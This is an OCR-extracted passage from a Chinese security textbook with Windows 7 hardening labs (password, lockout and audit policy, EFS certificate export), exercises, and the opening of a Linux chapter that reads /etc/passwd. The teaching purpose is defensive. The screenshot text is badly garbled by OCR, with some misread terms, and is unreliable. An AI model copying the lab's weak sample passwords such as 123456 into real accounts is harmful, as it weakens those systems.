1. 实验 内 容 

此 次 实验 内 容 包括 四 项 : 删除 不 使 用 的 账户 ; 禁用 guest 账户 ; 用 户 密码 策略 设置 ; 
用 户 锁定 策略 设置 。 

用 户 为 了 记忆 、 使 用 的 方便 ,会 采用 与 自己 周围 事物 相关 的 单词 或 数字 作为 口令 ,这 
些 类 型 的 口令 容易 破解 , 常 称 为 弱 口 令 , 针 对 弱 口令 的 攻击 主要 有 字典 攻击 和 暴力 破解 ， 
为 了 防范 这 些 攻击 ,Windows 系统 提供 了 密码 策略 和 用 户 账户 锁定 策略 。 

密码 策略 是 增强 口令 强度 的 策略 ,在 默认 的 情况 下 都 没有 开启 ,其 中 ,密码 复杂 性 要 
求 " 策 略 要 求 设置 的 密码 必须 是 大 写字 母 ,小 写字 和 母 ,特殊 字符 和 数字 的 组 合 ;“ 密 码 长 度 
最 小 值 ”策略 是 密码 长 度 至 少 要 满足 的 要 求 ;“ 密 码 最 长 留存 期 ”策略 决定 了 密码 可 以 使 
用 的 最 长 时 间 ( 以 天 为 单位 ) ,也 就 是 说 , 当 密 码 使 用 超过 最 长 留存 期 后 ,就 自动 要 求 用 户 
修改 密码 ;“ 强 制 密码 历史 ”策略 是 系统 记录 的 历史 密码 数目 ,其 目的 是 为 了 防止 用 户 将 
几 个 密码 轮换 使 用 ,假设 “强制 密码 历史 ” 值 为 5, 表示 系统 会 记录 5 个 最 近 使 用 的 密码 ， 
用 户 设置 新 密码 时 不 能 与 前 5 次 密码 相同 。 

账户 锁定 策略 包括 账户 锁定 阔 值 .锁定 时 间 复位 账户 锁定 计数 器 ,通过 合理 设置 ,可 
以 有 效 防止 字典 攻击 和 暴力 破解 。 账 户 锁定 阔 值 是 指 允 许 用 户 登 录 尝 试 的 次 数 ,如 果 登 
录 失 败 次 数 超过 阔 值 则 该 账户 会 被 系统 锁定 ,锁定 时 间 由 账户 锁定 时 间 策 略 决定 。 复 位 
账户 锁定 计数 器 决定 了 需要 等 待 多 长 时 间 , 系 统 才 自 动 将 记录 的 失败 次 数 清 零 , 例 如 设置 
账户 锁定 阔 值 为 10 次 ,账户 锁定 时 间 为 60 分 钟 、 复 位 账户 锁定 计数 器 为 30 分 钟 , 如 果 一 
位 用 户 忘记 了 自己 的 密码 ,尝试 了 5 次 就 没有 继续 尝试 ,这 时 他 的 账户 还 没有 被 锁定 ,但 
系统 已 经 记录 了 失败 尝试 的 次 数 为 5, 在 最 后 一 次 尝试 的 30 分 钟 后 ,记录 下 来 的 5 次 失 
败 尝 试 会 被 清 零 ,该 账户 又 获得 了 10 次 尝试 的 机 会 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 。 


4.3.3 实验 步骤 


1. 删除 不 再 使 用 的 账户 

CD 依次 选择 “开始 一 “控制 面板 ”管理 工具 ”- 盖 计算 机 管理 ?选项 ,出 现 如 图 4.7 
所 示人 窗口 ,展开 界面 左 侧 的 “计算 机 管理 ”本 地 用 户 和 组 ”, 双 击 * 用 户 ? 选 项 ,在 界面 右 
侧 列 出 系统 中 所 有 用 户 名 称 。 
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# Administrator. 
Fi Guest 
E lenovo 


图 4.7 计算 机 管理 界面 


(2) 在 图 4.7 中 , 右 击 不 再 使 用 的 账户 ,例如 test, 在 弹出 的 快捷 菜单 中 选择 “删除 ” 
选项 , 即 可 从 系统 中 删除 该 账户 ,如 图 4.8 所 示 。 


[XED BEA SEV жїн) | 


| eztgxos!HE 


ELUCET 名 称 全 名 操作 
41 Pann FE Administrator 
» Q emos E Guest mes " 
| > 国 事 人 查看 器 rom 
» а 共享 文件 夫 


图 4.8 删除 test 账户 


2. Guest 账户 的 禁用 

在 图 4. 8 所 示 的 界面 中 , 右 击 Guest 账户 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,在 
弹出 的 对 话 框 中 “账户 已 禁用 ”一 栏 前 打 勾 ,如 图 4. 9 所 示 。 

3. 用 户 密码 策略 设置 

CD 选择 “开始 ”>“ 所 有 程序 ”> “附件 ”一 “运行 "选项, 出现 如 图 4. 10 所 示 的 “运行 ” 
对 话 框 ,在 对 话 框 中 输入 secpol. msc, 打 开 Windows 本 地 安全 策略 窗口 。 
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Guest ШЕЕ 
ORO [s [ect 


м Guest 


全 名 中 
| dro) 供 来 宾 访 j 引 十 算 机 或 访问 域 的 内 置 账户 


口 用 户 下 次 登录 时 须 更 羽 密码 (И) 
国 用 户 不 能 更 改 密码 с) 
密码 永 不 过 期 F) 

IK PIER o) 

帐户 已 锁定 O 


图 4.9 禁用 Guest 账户 图 4. 10 “运行 "对 话 框 


(2) 在 图 4.11 所 示 的 本 地 安全 策略 窗口 中 ,展开 左 侧 树 形 菜单 “安全 设置 >“ 账户 
策略 ”, 选 择 “ 密 码 策略 ”选项 ,在 窗口 右 侧 出 现 密 码 策略 项 。 


= BMA SEV RAH = 
Фә 201х010 rm 


B еш ав ы 安全 设置 

4 Ug 账户 第 略 局 密码 必须 符合 复杂 性 要 求 已 禁用 
医 E 国富 码 长 度 是 小 值 043 
> bend 同族 码 最 短 使 用 期限 ож 

> @ 216 Шаванн 42x 

» отец Сзан оона 

>B а аи 1 RESTER QE SHEER Bam 

» 国 软件 限制 第 略 

» E] 应 用 程序 控制 第 略 

b IP 安全 第 略 , 在 本 地 计算 机 

» Ш ERREUR 


图 4.11 本 地 安全 策略 界面 


СЗ) 根据 需要 确定 密码 长 度 最 小 值 . 密 码 最 长 使 用 期 限 、 密 码 最 短 使 用 期 限 、 强 制 密 
码 历史 等 的 设置 策略 ,例如 可 以 设置 如 表 4. 5 所 示 规 则 。 


表 4.5 密码 策略 设置 举例 


ж ж fü ж ж 值 
密码 复杂 性 要 求 启用 密码 最 长 留存 期 15 天 
密码 长 度 最 小 值 6 位 强制 密码 历史 5 个 
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(4) 双击 对 应 的 策略 选项 ,在 打开 的 对 话 框 中 设置 表 4. 5 中 的 规则 ,这 里 以 密码 复杂 
性 设置 与 验证 为 例 。 

依次 选择 “开始 ”一 “控制 面板 ”>“ 管 理工 具 ”>“ 计 算 机 管理 ”选项 ,展开 界面 左 侧 的 
树 形 菜单 “计算 机 管理 ”>“ 本 地 用 户 和 组 ”, 双 击 “ 用 户 ” 选 项 ,在 界面 右 侧 列 出 系统 中 所 有 
用 户 名 称 , 在 右 侧 空间 中 右 击 ,出 现 如 图 4. 12 所 示 快 捷 菜单 ,选择 “新 用 户 ” 选 项 ,出 现 如 
图 4.13 所 示 “ 新 用 户 ” 对 话 框 ,新 建立 一 个 用 户 test, 密 码 为 空 。 


RHA ЖИНА) SEV SAH 


图 4.12 新 建 用 户 菜单 


mr EN ë 
APRU: test] 
£m]: 
dot): 


So: 

确认 密码 С): 

园 用 户 下 次 登录 时 须 更 改 密码 M 
口 用 户 不 能 更 改 密码 б) 

口 密码 永 不 过 期 N) 

回 账户 已 禁用 O) 


#8 0) E 关闭 @) 


图 4.13 “新 用 户 ” 对 话 框 


进入 “本 地 安全 策略 ”设置 窗口 ,展开 界面 左 侧 的 树 形 菜单 “账户 策略 ”>“ 密 码 策略 ”， 
更 改 “密码 必须 符合 复杂 性 要 求 " 策 略为 “启用 ”, 如 图 4. 14 所 示 。 

为 test 用 户 设置 密码 123, 系 统 弹 出 如 图 4. 15 所 示 错 误 信息 提示 框 ,不 允许 设置 该 
密码 ,说明 刚刚 设置 的 安全 策略 已 经 起 作用 了 。 
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图 4.14 设置 密码 复杂 性 策略 


图 4.15 设置 密码 出 错 


修改 test 用 户 密码 为 Aal23456 ,满足 复杂 性 要 求 ,密码 设置 成 功 。 

4. 用 户 锁定 策略 设置 

(1) 在 图 4. 16 所 示 的 “本 地 安全 策略 "窗口 中 ,展开 “安全 设置 ">“ 账 户 策略 ”, 选 择 
“账户 锁定 策略 ”选项 ,在 窗口 右 侧 , 出 现 账户 锁定 策略 。 
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> @ IP 安全 第 略 , 在 本 地 计算 机 
› В 高 级 审核 策略 配置 


0 次 无 效 登录 


%- 


图 4.16 账户 锁定 策略 设置 窗口 


(2) 根据 需要 设置 锁定 策略 ,例如 可 以 设置 如 图 4. 17 所 示 的 锁定 策略 ,下 面 通过 测 


试 案例 验证 锁定 策略 。 


图 4.17 设置 账户 锁定 策略 


在 验证 时 ,为 在 短 时 间 内 看 到 策略 配置 效果 ,暂时 将 账户 锁定 时 间 设 置 为 1 分 钟 ( 用 


户 实际 设置 的 安全 策略 应 按 图 4. 17 所 示 ,否则 容易 被 攻击 )。 


以 前 面 创建 的 test 用 户 身 份 登录 ,连续 输 错 5 次 密码 后 ,用 户 登录 界面 将 被 锁定 ， 
等 待 1 分 钟 后 ,锁定 取消 ,输入 正确 密码 ,可 以 登录 系统 ,说 明 设置 的 锁定 策略 起 作 


йт. 
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4.4 Windows 审核 策略 配置 实验 


4.4.1 实验 目的 
T fit Windows 审核 策略 的 主要 内 容 和 用 途 ,掌握 Windows 审核 策略 的 配置 方法 。 


4.4.2 实验 内 容 及 环境 


1. 实验 内 容 

Windows 审核 策略 配置 与 验证 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 。 
4.4.3 实验 步骤 


1. 文件 操作 的 审计 
d) 参照 4. 3. 3 节 的 实验 步骤 ,打开 “本 地 安全 策略 ”对 话 框 ,选择 “本 地 策略 ”>“ 审 
核 策 略 ” 选 项 ,双击 “审核 对 象 访问 "选项 , 勾 先 “成功” 和 “失败 ”, 如 图 4.18、 图 4. 19 所 示 。 


图 4.18 审核 策略 设置 窗口 


(2) 在 硬盘 上 新 建 一 个 名 为 “123. txt” 的 文件 , 右 击 该 文件 ,在 弹出 的 快捷 菜单 中 选 


择 “ 属 性 ”选项 ,然后 单 击 “安全 ”选项 卡 ,如 图 4. 20 所 示 。 
(3) 在 图 4. 20 中 , 单 击 “ 高 级 "按钮 ,然后 选择 “审核 ”选项 卡 ,出 现 如 图 4. 21 所 示 的 


对 话 框 , 单 击 “ 编 辑 ” 按 钮 ,出 现 如 图 4. 22 所 示 的 窗口 。 
(4) 在 图 4. 22 中 , 单 击 “ 添 加 ”按钮 ,出 现 如 图 4. 23 所 示 的 “选择 用 户 或 组 ”对 话 框 ， 


在 “输入 要 选择 的 对 象 名 称 ”编辑 框 中 ,输入 “Everyone”。 
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本 地 安全 设置 р 
审核 对 象 访问 


对 象 名 称 : E:M23. txt 
组 或 用 户 名 (6); 


Sa system 
90 Administrators (sas-PCMAdninistrators) 
Å Users (sas-PC\Users) 


审核 这 些 操作 
成 功 G) 
кж) 


要 更 改 权限 ， 请 单 击 “编辑 ”。 
Баман омей Users 的 权限 


E PRBE TETE 
A ШЕ i 


ASARES. (8921468) 


图 4.20 安全 属性 设置 窗口 


若 要 查看 某 个 权限 项 目的 详细 信息 ， 请 观 击 该 项 目 。 若 要 修改 权限 ， 请 单 击 “ 更 改 权限 ”。 


对 象 名 称 : E:\123. txt I 
ЖЕЛ т): 
类 型 aR 


| 编辑 E) | 


国 包括 可 从 该 对 象 的 父 项 继承 的 审核 项 目 о) 


定 核 对 象 访问 的 要 求 星 什么 ? 


图 4.21 文件 审核 界面 
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审核 
| 
| 要 查看 或 编辑 审核 项 目的 详细 信息 ， 请 选择 该 项 目 并 单 击 “ 编 辑 ”。 
对 象 名 称 : E:M23. txt 
ЖЕЛ т) 
类 型 名 称 访问 继承 于 
h 
ааа) | mes. J( me 
ВИ 包括 可 从 该 对 象 的 父 项 继承 的 审核 项 目 I) 
С) [ый )[ mmo 
图 4.22 文件 审核 项 目 编辑 界面 
am 
选择 此 对 象 类 型 5) 
用 户 、 组 或 内 置 安 全 主体 юл)... 
TR AN: 
SAS-FC IE 0)... 
输入 要 选择 的 对 象 名 称 ФП) (Е): | 
Everyone. _ 检查 名 称 CC) 
aw эй 


图 4. 23 “选择 用 户 或 组 ”对 话 框 


(5) 在 图 4. 23 中 , 单 击 “ 确 定 ” 按 钮 .出 现 如 图 4. 24 所 示 的 “123. txt 的 审核 项 目 ” 对 
话 框 ,在 访问 列表 中 选择 “删除 ”和 “更 改 权限 ”的 功能 ,设置 完成 后 单 击 “ 确 定 ” 按 钮 。 

至 此 ,对 “123. txt” 的 审计 项 设置 完成 ,如 图 4.25 所 示 。 

(6) 为 验证 审核 策略 是 否 起 作用 ,删除 此 文件 ,查看 删除 文件 的 操作 是 否 被 记录 到 日 
志 中 。 依 次 选择 “开始 ”一 “控制 面板 ”>“ 管 理工 具 ” 一 “事件 查看 器 ”>“Windows НА” 
“安全 性 ”选项 ,出 现 如 图 4. 26 所 示 窗 口 , 可 以 看 到 系统 成 功 审 核 了 文件 删除 事件 。 

2. Windows 账户 管理 操作 的 审计 

(1) 参照 4. 3. 3 节 的 实验 步骤 ,打开 “本 地 安全 设置 "对 话 框 ,选择 “本 地 策略 ”一 “ 审 
核 策 略 ” 选 项 ,双击 “审核 账户 管理 ”选项 , 勾 先 “成功? 和“ 失败”, 如 图 4.27 所 示 。 

(2) 为 验证 该 审核 策略 是 否 起 作用 ,在 系统 中 添加 一 个 账户 ,查看 日 志 中 是 否 记 录 新 
建 账户 的 事件 。 选 择 “ 开 始 ” 一 “运行 ”选项 ,输入 cmd, 在 控制 台 下 输入 创建 用 户 myTest 
和 设置 口令 123456 的 命令 ,如 图 4. 28 所 示 。 
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应 用 到 四 ) :| 只 是 这 个 对 象 


入 这 些 审核 项 | 
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图 4.24 "123. txt 的 审核 项 目 ” 对 话 框 


[дй | 审核 Гана | 有效 权限 ] 
若 要 查看 某 个 权限 硕 目的 详细 信息 ， 请 双击 该 项 目 。 若 要 修改 权限 ， 请 单 击 “ 更 改 权限 ”。 


对 象 名 称 : E:\123. txt 
TEINA т): 


_ TN 
包括 可 从 该 对 象 的 父 项 继承 的 审核 项 目 (D 


访问 的 要 求 星 什么 ? 


图 4.25 文件 审核 项 设置 完成 
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图 4.26 事件 查看 器 


А DUIS 以 普 代 类 别 级 别 审核 第 略 ， 则 可 能 不 会 


请 戎 阅 审核 账户 管理 。 (0921468) 


图 4.27 用 户 管理 审核 设置 
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本 6.1.7601] 
所 有 (c) 2009 Microsoft Corporation. REITER. 


:NUsersNlenouo>net user myTest 123456 /add 


图 4.28 创建 新 用 户 


(3) 依次 选择 “开始 ”一 剖面 板 ”>“ 管 理工 具 ”->“ 事 件 查 看 器 ”>“Windows His" 
“安全 ”选项 ,出 现 如 图 4. 29 所 示 窗 口 ,系统 成 功 审核 了 用 户 创建 事件 。 
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| EIS AU ^| MEA. = 
| T ТЕЛ Ge 
| 设备 管理 器 d | 
Км BSERM) ёт gs 
& 
|| = атт 来 源 (S): Microsoft Windows 2:23 记录 时 间 (D): 2018/12/17 17:31:06 EM » 
| Ё 服务 和 应 用 程序 事件 ID(E): 4720 任务 尖 别 MW: 用 户 帐户 管理 Ы 8. 
| «8/0 信息 эчак: жїнї - |8 зж 
Г? ‚ 
日 T ; 帮助 》 


图 4.29 事件 查看 器 


3. Windows 用 户 登录 事件 的 审计 


(1) 参照 4. 3. 3 节 的 实验 步骤 ,打开 “本 地 安全 设置 "对话 框 ,选择 “本 地 策略 ”>“ 审 


核 策 略 ” 选 项 ,双击 “审核 账户 登录 事件 ”选项 ,选中 “成 功 ” 和 “失败 ”, 如 图 4. 30 所 示 。 
(2) 为 验证 上 述 审核 策略 是 否 起 作用 ,注销 当 


所 示 。 


前 用 户 


:并 


i 登录 ,查看 系统 是 否 记 
录 了 该 事件 。 打 开 “ 事 件 查 看 器 ”, 选择“ 安全 性 ”, 可 以 看 到 登录 审核 记录 ,如 图 4. 31 
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审核 这 些 操作 : 
T RHG) 
[ES 


А pt 其 他 策略 以 普 代 类 别 级 别 审核 策略 ， 风 可 能 不 会 
EVENIRE ПЕ БЕ (0921468) 


2018/12/17 17:45:08 Microsoft М... 
2018/12/17 17:45:08 Microsoft W... 
2018/12/17 17:45:04 Microsoft М... 
2018/12/17 17:45:02 Microsoft М... 
2018/12/17 17:45:01 Microsoft М... 
2018/12/17 17:45:01 Microsoft М... 
2018/12/17 17:44:37 Microsoft W.. 
2018/12/17 17:44:18 Microsoft М... 


ш HEREDES... 

+ marum. 
导入 自 定义 视图 
ems. 

Y аа-а. 

В me 

ge ян. 

Ы 将 所 有 事件 另存 为 
将 任务 附加 到 比 日 


Microsoft Windows 2:23 记录 时 间 (D): 2018/12/17 17: 
назву: эт 


ERU. WESS 
БШ): sas-PC 


图 4.31 事件 查看 器 
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4.5 EFS 数据 加 密实 验 


4.5.1 实验 目的 
理解 EFS 文件 加 密 原 理 ,掌握 EFS 文件 加 密 方法 。 


4.5.2 实验 内 容 及 环境 


1. 实验 内 容 
采用 EFS 加 密 文 件 ,通过 密 钥 的 导入 、 导 出 ,实现 加 密 文件 在 多 个 用 户 之 间 的 共享 。 


2. 实验 环境 
主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 。 


4.5.3 实验 步骤 

CD 打开 磁盘 格式 为 NTFS 的 磁盘 ,创建 文件 “EE:\test\test. txt”, 在 文件 中 写 入 内 
容 * 这 是 一 个 加 密 测 试 文件 !” ,保存 后 关闭 文件 。 右 击 文件 ,打开 * 属 性 ?窗口 ,选择 “常规 ” 
选项 , 单 击 “ 高 级 "按钮, 选择“ 加密 内 容 以 便 保护 数据 ”, 单 击 “ 确 定 ” 按 钮 ,如 图 4. 32 所 示 。 


J| # жания. 


文件 属性 
国 可 以 存档 文件 以) 
同 除 了 文件 属性 外 ， 还 允许 案 引 此 文件 的 内 容 О) 
Efe o o 
ГЕР f: diit sid С) 
贺 加 区 内 容 以 便 保 护 数据 全) 详细 信息 0) 
@ DVD RW жаз (С>) 
Ce )[ ва jJ 


& DVD 驱动 器 (Hi OFF 


LI > 
test.bxt 修改 日 期: 2018/12 
文本 文档 大 小 22 字 节 ERW 


图 4.32 文件 加 密 
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(2) 依次 选择 “开始 ”>“ 控 制 面板 ”>“ 管 理工 具 ”>“ 计 算 机 管理 ”选项 ,出 现 如 图 4. 33 
所 示 窗 口 ,展开 界面 左 侧 的 “计算 机 管理 ”>“ 本 地 用 户 和 组 ”, 双 击 “ 用 户 ” 选 项 ,在 界面 右 
侧 列 出 系统 中 所 有 用 户 名 称 , 在 右 侧 空白 处 右 击 ,在 弹出 的 快捷 菜单 中 选择 “新 用 户 ” 选 
项 ,创建 一 个 名 为 USER 的 新 用 户 , 且 不 要 创建 为 计算 机 管理 员 用 户 。 


|| xem виңд яшм meon | 
СЗТ ЕСТ... | |. .«— | | ./| «— | — 1 
LEID E E mue ит 
^ |] жети лата... TER ыд ERG 
| Osee E Guest GRRR.. meme , 
> Ш seran Pieno 
TEs Sus 
nre 
Gm E zhang zhang | 
ша 
4 errem EWM 
eeu 0 
ш зате Эш)... 
rd жыр > 
mewo > 
SABRO 
- | 
图 4.33 新 建 用 户 


(3) 单 击 “ 开 始 ” 按 钮 ,在 弹出 的 快捷 菜单 中 单 击 “ 关 机 ” 右 侧 小 三 角 图 标的 按钮 ,出 现 
如 图 4. 34 所 示 的 子 菜单 , 单 击 “ 切 换 用 户 ” 按 钮 ,以 刚刚 新 建 的 USER 用 户 身 份 登录 。 


(= Microsoft Office Word 2007 


е Mozilla Firefox 
© VMware Workstation 


控制 面板 
设备 和 打印 机 
默认 程序 


帮助 和 支持 


[Ж2| Microsoft Office Excel 2007 
е) 


> ”所 有 程序 


| exesuxe 


图 4.34 切换 用 户 莱 单 
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(4) 导航 到 “EE:\test" 目 录 下 ,双击 “test. txt” 选 项 ,发 现 无 法 打开 该 文件 ,说 明文 件 已 
经 加 密 , 如 图 4.35 所 示 。 


OD 


9 ТТЕ? 
ино] TAn на Е) 格式 0) 查看 WW) 帮助 00 


а} аво) REW IRI 帮助 00 


хе uGgows s 


图 4.35 打开 加 密 文件 失败 


O) 再 次 切换 用 户 ,以 加 密 文件 的 账户 登录 系统 。 单 击 “ 开 始 " 按 钮 ,在 “运行 " 框 中 输 
入 mmc, 打 开 系 统 控制 台 。 单 击 左 上 角 的 “文件 ”菜单 ,选择 “添加 /删除 管理 单元 ” 子 菜 
单 ,如 图 4. 36 所 示 。 


KAAFEN ETONE, 


1 CAWindows\..\compmgmt. mse 
2 CAWindows\system32\secpoLmse 
3 CAWindows\system32Awé msc 


А CAWindows\system32\gpeditmse 
ано 


图 4.36 系统 控制 台 窗口 


(6) 在 弹出 的 对 话 框 左 侧 的 可 用 管理 单元 中 选择 “证 书 ”, 如 图 4. 37 所 示 , 单 击 “ 添 
加 ”按钮 。 在 弹出 的 “证 书 管理 ”对 话 框 中 选择 “我 的 用 户 账户 ”, 然 后 单 击 “ 完 成 ”按钮 ,如 
图 4. 38 所 示 。 
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ЖЫ 计算 机 上 为 此 控制 各 选择 可 用 的 管理 单元 并 配置 所 选 的 一 组 管理 单元 。 对 于 可 扩展 的 管理 单元 ， 您 可 以 配置 要 启用 | 


可 用 的 管理 单元 B) : 所 选 管理 单元 H: 
管理 单元 供应 商 e 国 控 制 台 根 节点 ИИГЕ). ' 
| | DERRE Yindov... Microsoft ... o) 
ш 共享 文件 来 Microsoft mun, pee) 
计算 机 管理 Microsoft - FE 
piden Microsoft ... IT] 
设备 管理 器 Microsoft .. [— RO —] 
事件 查看 器 Microsoft . ESTE ELM 
授权 管理 器 Microsoft 
国文 件 夫 Microsoft ... 
同性 能 上 监视 器 Microsoft 
Microsoft .. 
司 AARIS Microsoft 
ARRS Microsoft Ss (CER) 
d: 


证 书 管理 单元 允许 您 浏览 自己 的 、 一 个 服务 的 或 一 各 计算 机 的 证 书 存 储 内 容 。 


Comm )[ má jJ 


图 4. 37 “添加 或 删除 管理 单元 ”对话 框 


(CE Cm) 


图 4. 38 “证 书 管理 ”对 话 框 


(7) 在 控制 台 窗 口 左 侧 的 目录 树 中 选择 “证 书 ”>“ 个 人 ”一 “证 书 ” 选 项 ,如 图 4. 39 所 
示 , 用 于 加 密 文件 系统 的 证 书 显示 在 右 侧 的 窗口 中 。 

(8) 如 图 4. 40 所 示 ,选中 证 书 , 右 击 , 在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”>“ 导 出 ” 
选项 ,打开 “证 书 导出 向 导 ” 对 话 框 ,如 图 4. 41 所 示 。 

(9) 在 图 4. 41 中 , 单 击 “ 下 一 步 ” 按 钮 .在 出 现 的 如 图 4. 42 所 示 对 话 框 中 选择 “是 , 导 
出 私 钥 ”, 然 后 继续 单 击 “ 下 一 步 ”, 出 现 如 图 4. 43 所 示 的 对 话 框 ,选择 导出 文件 格式 , 单 击 
“下 一 步 ?按钮 ,出 现 如 图 4. 44 所 示 的 对 话 框 ,设置 保护 私 钥 的 密码 。 
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单 击 "下 一 步 "继续 。 


М 


o [юй] 


4.41 “导出 证 书 向 导 ” 对 话 框 
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导出 私 钥 
您 可 以 选择 将 私 钥 和 证 书 一 起 导出 


делет. 如 果 要 将 私 钥 跟 证 书 一 起 导出 ， 您 必须 在 后 面 一 页 上 键入 密 


您 想 将 私 钥 跟 证 书 一 起 导出 由? 
өв. Зно 
OF: 不 要 导出 私 铜 @) 


图 4.42 导出 私 钥 


导出 文件 格式 
可 以 用 不 同 的 文件 格式 导出 证 书 。 


选择 要 使 用 的 格式 : 

D DER 编码 二 进 制 Х.509 С CER) M) 

5 Base64 编码 X.509( CER) S) 

D 加 密 消息 语法 标准 - PKCS 4T ЕВ (PTB) (С) 
如 果 可 能 ， 风 数据 包括 证 书 路 径 中 的 所 有 证 书 D) 
图 个 人 信息 交换 - PKCS #12( PFX) Œ) 

回 如 果 可 能 ， 则 数据 包括 证 书 路 径 中 的 所 有 证 书 D 
如 果 导 出 成 功 ， 晤 除 私 钥 0 
导出 所 有 扩展 属性 0) 

Microsoft 序列 化 证 书 存 铺 ( SST) (T) 


了 和 解 证 书 文件 格式 的 详细 信息 


4.43 导出 文件 格式 
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输入 并 确认 密码 WE) C): 


CESON) ( m& ) 


图 4.44 为 私 钥 设置 密码 保护 


(10) 单 击 * 下 一 步 ?按钮 ,出 现 如 图 4. 45 所 示 的 对 话 框 ,设置 要 导出 的 文件 的 文件 
名 ,并 设置 要 导出 文件 的 保存 路 径 ,注意 一 定 要 保存 在 C 盘 中 ,完成 证 书 导出 。 


要 导出 的 文件 
指定 要 导出 的 文件 名 。 


文件 名 外 ); 


Ci\test, pfx 


图 4.45 指定 导出 文件 名 


OD 再 次 切换 用 户 , 以 新 建 的 USER 用 户 身份 登录 系统 , 按 刚才 的 步骤 打开 控制 台 
并 添加 证 书 , 然 后 选中 个 人 ,会 发 现 与 第 7 步 不 同 的 是 右边 没有 证 书 。 选 择 * 个 人 ?选项 ， 
选择 “所 有 任务 ”>“ 导 入 ”选项 ,如 图 4. 46 所 示 。 
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lg xu вина SEV BERO BOM жвн AOE 
LE o E c 
Ш 控制 台 根 节点 а i mum aram |+ 

„д 证 书 - 当前 用 户 _ ES 

ГУЯ 此 栅 图 中 设 有 可 显示 的 项 目 。 

Gus ее 

> D 委 信 任 的 要 证 书 自发 机 构 

> Ш 企业 信任 

> 国 ФЕН ВНШ TUS FRESI >| йв). 

> [3 Active Directory 用 户 对 剑 в, 

» Ш SHRGHORHSN end i 

> Ш анов zav DELE) К 

> Ш 笋 三 方 根 证 书 及 发 机 构 

пишер > 

， 受信 任 人 

dre XB) 

» 国 智能 卡 受信 任 的 根 эзин) 
| 
[rtm] 

图 4.46 导入 证 书 


(12) 在 如 图 4. 47 所 示 的 对 话 框 中 ,选择 要 导入 的 证 书 文件 ,指定 文件 后 单 击 “ 下 一 
步 "按钮 ,输入 之 前 设置 的 私 钥 保 护 密码 ,继续 单 击 “ 下 一 步 ” 按 钮 ,完成 证 书 导入 。 


要 导入 的 文件 
指定 要 导入 的 文件 。 


文件 名 外 ); 


E:\test. pfx 


注意 : 用 下 列 格式 可 以 在 一 个 文件 中 存储 一 个 以 上 证 书 : 
个 人 信息 交换 - PKCS #12 (PFX, .P12) 
加 密 消息 语法 标准 - PKS #7 证 书 ( РТВ) 
Microsoft 序列 化 证 书 存储 (ssT) 


图 4.47 指定 要 导入 的 证 书 文件 


(13) 完成 导入 后 可 以 在 控制 台 的 “个 人 ” 栏 看 见 原 来 没有 证 书 的 地 方 现在 已 经 有 了 
一 个 新 的 证 书 , 如 图 4. 48 所 示 。 
(14) 再 次 进入 C 盘 , 双 击 加 密 文件 夹 中 的 文件 ,现在 文件 可 以 正常 打开 。 
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fü xen BMA SEV GERO GOW PMH -[six 
e.» гп аә! н _ _ 
EEZ [^ 
Wr Тро 


名 


5 D шаннан h 


2 € | ‹ r—Üdc—á] 


图 4.48 成 功 导入 证 书 


4.6 练 J й 


(1) Windows Vista 之 后 的 版 本 中 提供 了 UAC(User Account Control. UAC) 机 制 
来 管理 和 限制 用 户 权限 ,请 验证 将 UAC 设置 为 不 同 级 别 对 系统 安全 性 和 用 户 体验 带 来 
的 影响 。 

(2) 本 章 介 绍 了 EFS 文件 加 密 机 制 , Windows Vista 之 后 的 版 本 还 提供 了 BitLocker 
加 密 机 制 , 请 比较 两 种 加 密 机 制 的 不 同 及 适用 场合 。 

(3) 利用 Windows 访问 控制 机 制 设置 文件 访问 控制 权限 并 验证 。 

(4) 配置 Windows 安全 策略 使 得 用 户 登 录 窗 口 不 出 现 上 次 登录 的 用 户 名 信息 。 
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a 
Linux 安全 机 制 


5.1 Linux 安全 机 制 概述 


Linux 是 UNIX 克隆 (UNIX clone) 或 UNIX 风格 (UNIX alike) 的 操作 系统 ,能 运行 
主要 的 UNIX 工具 软件 .应 用 程序 ,是 一 个 支持 多 用 户 、 多 进程 .多 线程 .实时 性 较 好 的 功 
能 强大 而 稳定 的 操作 系统 。 


5.1.1 用 户 标识 和 鉴别 


Linux 中 权限 最 高 的 是 超级 用 户 root, 其 在 系统 中 的 地 位 类 似 于 Windows NT 的 管 
理 员 Administrator 用 户 ,可 以 执行 任何 操作 ,管理 一 切 资源 ,root 用 户 一 般 在 安装 系统 
时 创建 。 其 他 用 户 通常 是 在 系统 安装 完成 后 由 root 用 户 创 建 ,这 类 用 户 只 能 访问 和 管理 
有 限 资 源 ,也 称 受 限 用 户 。 

在 系统 内 部 具体 实现 中 ,系统 会 为 每 个 用 户 分 配 一 个 唯一 的 标识 号 UID(User ID), 
UID 是 一 个 数值 ,比如 root 用 户 的 UID 为 0, 普 通用 户 的 UID 通常 从 500 开始 顺序 编 
号 ,小 于 500 的 UID 是 系统 保留 用 以 启动 某 些 服 务 。 具 有 相似 属性 的 多 个 用 户 可 以 分 配 
到 同一 组 内 ,用 组 标志 符 (Group ID,GID) 来 唯一 标识 ,每 个 用 户 可 以 属于 一 个 或 多 个 用 
户 组 。 用 户 号 (UID) 和 用 户 组 号 (GID) 决 定 了 用 户 的 访问 权限 。 

所 有 与 用 户 相 关 的 信息 存储 在 系统 中 的 /etc/passwd 文件 中 ,包含 用 户 的 登录 名 、 
UID,GID 等 。 通 过 执行 系统 命令 “ls -l /etc/passwd” 可 以 看 到 ,这 个 文件 的 拥有 者 是 
root 用 户 , 且 具有 读 写 该 文件 的 权限 ,而 普通 用 户 只 有 读 文件 的 权限 。 


#15 -1/etc/passwd 


Ф - ги-г-- г-- root root 
那么 ,在 /etc/passwd 文件 中 具体 包含 哪些 内 容 呢 ?可 以 通过 系统 命令 “cat /etc/ 
passwd” 查 看 。 


如 图 5. 1 所 示 ,该 文件 是 一 个 文本 文件 ,每 一 行 都 由 7 个 部 分 组 成 ,每 两 个 部 分 之 间 
用 冒号 分 割 开 ,这 7 个 部 分 分 别 描述 了 以 下 信息 : 用 户 名 ,口令 、 用 户 ID 组 ID、 用 户 描 
述 、 用 户主 目录 、 用 户 的 登录 Shell。 

在 用 户 登 录 时 ,输入 用 户 名 ,口令 信息 ,用 户 名 是 标识 , 它 告 诉 计 算 机 该 用 户 是 谁 ,而 
